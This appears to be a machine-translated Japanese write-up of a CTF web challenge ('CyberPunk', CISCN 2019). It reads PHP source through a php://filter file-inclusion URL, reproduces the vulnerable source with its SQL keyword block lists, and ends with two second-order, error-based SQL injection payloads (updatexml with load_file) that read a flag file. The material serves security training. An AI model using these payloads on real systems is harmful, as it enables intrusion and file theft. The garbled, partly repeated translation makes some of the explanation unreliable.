BUUCTF:[CISCN 2019華北試合区Day 1 Web 5]CyberPunk
41400 ワード
F 12ソースコードを確認すると、パラメータが偽プロトコルファイルを通じてソースコードの読み取りを試みていることが分かった.
発見はindexを除く.phpにはいくつかのphpファイルがあります:confirm.php,delete.php,change.php,search.php
ソースコードを分析するとchangeを除くことが分かった.phpのaddressというパラメータはaddslashes($_POST[「address」)のいくつかのエスケープを行っただけで,他のパラメータはフィルタリングされ,注入方法はほとんどない.このaddressパラメータを重点的に見てみましょう
二次注入user_nameとphoneパラメータに問題がなければaddressパラメータはデータベースに格納されます.payloadを構築するだけで、次の正常なクエリーデータがトリガーされてSQL注入になります.ここではエラー注入方式を使って、私たちが望んでいるデータを調べますが、flagの長さを考慮すると、updatexmlは毎回32ビットしか表示されませんので、2回に分けて読み取る必要があります.payloadは以下の通りです.
初回リード上位30ビット
先に提出し、 を修正してflag の一部を得る
2回目の読み取り後のflag:
http://467ceaa4-2e02-46f9-b14a-25ec91a65986.node3.buuoj.cn/?file=php://filter/convert.base64-encode/resource=index.php
発見はindexを除く.phpにはいくつかのphpファイルがあります:confirm.php,delete.php,change.php,search.php
//index.php
ini_set('open_basedir', '/var/www/html/');
// $file = $_GET["file"];
$file = (isset($_GET['file']) ? $_GET['file'] : null);
if (isset($file)){
if (preg_match("/phar|zip|bzip2|zlib|data|input|%00/i",$file)) {
echo('no way!');
exit;
}
@include($file);
}
?>
//HTML ,
<!--?file=?-->
//search.php
require_once "config.php";
if(!empty($_POST["user_name"]) && !empty($_POST["phone"]))
{
$msg = '';
$pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';
$user_name = $_POST["user_name"];
$phone = $_POST["phone"];
if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){
$msg = 'no sql inject!';
}else{
$sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'";
$fetch = $db->query($sql);
}
if (isset($fetch) && $fetch->num_rows>0){
$row = $fetch->fetch_assoc();
if(!$row) {
echo 'error';
print_r($db->error);
exit;
}
$msg = " :"
.$row['user_name'].", :"
.$row['phone'].", :"
.$row['address']."";
} else {
$msg = " !";
}
}else {
$msg = " ";
}
?>
//confirm.php
require_once "config.php";
//var_dump($_POST);
if(!empty($_POST["user_name"]) && !empty($_POST["address"]) && !empty($_POST["phone"]))
{
$msg = '';
$pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';
$user_name = $_POST["user_name"];
$address = $_POST["address"];
$phone = $_POST["phone"];
if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){
$msg = 'no sql inject!';
}else{
$sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'";
$fetch = $db->query($sql);
}
if($fetch->num_rows>0) {
$msg = $user_name." ";
}else{
$sql = "insert into `user` ( `user_name`, `address`, `phone`) values( ?, ?, ?)";
$re = $db->prepare($sql);
$re->bind_param("sss", $user_name, $address, $phone);
$re = $re->execute();
if(!$re) {
echo 'error';
print_r($db->error);
exit;
}
$msg = " ";
}
} else {
$msg = " ";
}
?>
//change.php
require_once "config.php";
if(!empty($_POST["user_name"]) && !empty($_POST["address"]) && !empty($_POST["phone"]))
{
$msg = '';
$pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';
$user_name = $_POST["user_name"];
$address = addslashes($_POST["address"]);
$phone = $_POST["phone"];
if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){
$msg = 'no sql inject!';
}else{
$sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'";
$fetch = $db->query($sql);
}
if (isset($fetch) && $fetch->num_rows>0){
$row = $fetch->fetch_assoc();
$sql = "update `user` set `address`='".$address."', `old_address`='".$row['address']."' where `user_id`=".$row['user_id'];
$result = $db->query($sql);
if(!$result) {
echo 'error';
print_r($db->error);
exit;
}
$msg = " ";
} else {
$msg = " !";
}
}else {
$msg = " ";
}
?>
//delete.php
require_once "config.php";
if(!empty($_POST["user_name"]) && !empty($_POST["phone"]))
{
$msg = '';
$pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';
$user_name = $_POST["user_name"];
$phone = $_POST["phone"];
if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){
$msg = 'no sql inject!';
}else{
$sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'";
$fetch = $db->query($sql);
}
if (isset($fetch) && $fetch->num_rows>0){
$row = $fetch->fetch_assoc();
$result = $db->query('delete from `user` where `user_id`=' . $row["user_id"]);
if(!$result) {
echo 'error';
print_r($db->error);
exit;
}
$msg = " ";
} else {
$msg = " !";
}
}else {
$msg = " ";
}
?>
ソースコードを分析するとchangeを除くことが分かった.phpのaddressというパラメータはaddslashes($_POST[「address」)のいくつかのエスケープを行っただけで,他のパラメータはフィルタリングされ,注入方法はほとんどない.このaddressパラメータを重点的に見てみましょう
二次注入user_nameとphoneパラメータに問題がなければaddressパラメータはデータベースに格納されます.payloadを構築するだけで、次の正常なクエリーデータがトリガーされてSQL注入になります.ここではエラー注入方式を使って、私たちが望んでいるデータを調べますが、flagの長さを考慮すると、updatexmlは毎回32ビットしか表示されませんので、2回に分けて読み取る必要があります.payloadは以下の通りです.
初回リード上位30ビット
1' where user_id=updatexml(1,concat(0x7e,(select substr(load_file('/flag.txt'),1,30)),0x7e),1)#
先に提出し、 を修正してflag の一部を得る
2回目の読み取り後のflag:
1' where user_id=updatexml(1,concat(0x7e,(select substr(load_file('/flag.txt'),30,60)),0x7e),1)#